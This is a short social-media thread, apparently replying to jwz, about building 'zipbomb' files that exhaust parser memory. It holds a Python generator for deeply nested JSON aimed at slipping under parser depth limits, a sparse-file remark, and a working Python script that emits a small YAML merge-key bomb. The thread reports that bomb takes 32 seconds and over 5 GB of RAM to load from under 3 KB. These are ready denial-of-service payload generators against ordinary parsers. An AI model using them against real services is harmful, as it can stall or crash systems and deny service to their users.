Zipbomb JSON.
Someone who is not me should formulate a maximally-malicious JSON file. I made one with a nesting depth of ~182 million, but "jq" gives up early, at only around depth 3,000. So one trick would be to find the right balance of nesting and array length that stays under typical parsers' limits as long as possible, while requiring as much RAM as possible to get there.
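The depth-vs-width balance described above can be sketched in Python (parameters mine, far smaller than the ~182-million depth mentioned; a toy, not a working exploit):

```python
import gzip
import json

# Toy version of the idea above: pure nesting compresses almost to
# nothing, which is what makes it zipbomb material.
depth = 500                 # stays under CPython's default recursion limit
payload = '[' * depth + ']' * depth
packed = gzip.compress(payload.encode())
print(f'{len(payload)} bytes raw -> {len(packed)} bytes gzipped')

# The balance the post describes: keep depth under a parser's limit
# (jq reportedly bails around 3,000) and spend the rest on array length,
# so the parsed node count is roughly depth * width instead of just depth.
width = 1000
level = '[' + '0,' * width  # each level: `width` zeros, then one child array
balanced = level * depth + '0' + ']' * depth
doc = json.loads(balanced)  # RAM cost scales with depth * width
```

The raw text still grows with depth times width; the compression only buys you a small file on disk, which is the "zipbomb" half of the trick.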
https://jwz.org/b/yk2x
-
@jwz what formats support sparse files?
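Not an answer to which formats preserve them, but the mechanism behind the question can be shown in a few lines (example mine): seek far past EOF and write one byte, and on filesystems with hole support the file reports ~1 GiB of length while allocating almost nothing.

```python
import os
import tempfile

# Make a sparse file: a 1 GiB hole followed by a single byte. Whether an
# archive format can represent that hole is exactly what the question asks.
fd, path = tempfile.mkstemp()
try:
    with os.fdopen(fd, 'wb') as f:
        f.seek(2**30)                            # 1 GiB hole
        f.write(b'\0')
    logical = os.path.getsize(path)              # apparent size
    physical = os.stat(path).st_blocks * 512     # bytes actually allocated
    print(logical, physical)
finally:
    os.remove(path)
```

An archiver that reads the file naively inflates the hole into a gigabyte of zeros, which is the amplification being hinted at.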
-
@jwz yaml could be a good target for this too, since it canonically supports references and ways to modify referenced data.
this python

print('a0: &t0')
print(' f0: v0')
for x in range(33):
    print(f'a{x+1}: &t{x+1}')
    print(f' <<: *t{x}')
    if x > 2:
        print(f' <<: *t{x-1}')
    print(f' f{x+1}: v{x+1} #override')
    print(f' g{x+1}: w{x+1} #override')

generates a yaml file that takes a while to load in python's yaml parser:
$ time python3 tl.py
real 0m31.946s
user 0m31.629s
sys 0m0.286s

40 steps gets the python interpreter over 5 gig (i'm too lazy to run this to completion) using just 2872 bytes of input.
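A speculative model of why this blows up (my assumption, not measured against PyYAML's internals): if the parser flattens each `<<` merge by copying the referenced mapping's pairs rather than sharing them, a level that merges the two previous anchors costs about as much as those two levels combined, a Fibonacci-style recurrence.

```python
# Cost model: c(0) = c(1) = 1, and each later level pays for both merged
# predecessors plus a constant. This grows like the golden ratio to the
# power of the level count.
def merge_cost(levels):
    cost = [1, 1]                          # levels 0 and 1 are trivial
    for x in range(2, levels + 1):
        cost.append(cost[x - 1] + cost[x - 2] + 1)
    return cost[levels]

print(merge_cost(33))                      # the 32-second case above
print(merge_cost(40) // merge_cost(33))    # 7 more levels: roughly 29x the work
```

That ~29x factor lines up with 33 levels taking half a minute while 40 levels runs the interpreter past 5 gig, though the real constant depends on the parser.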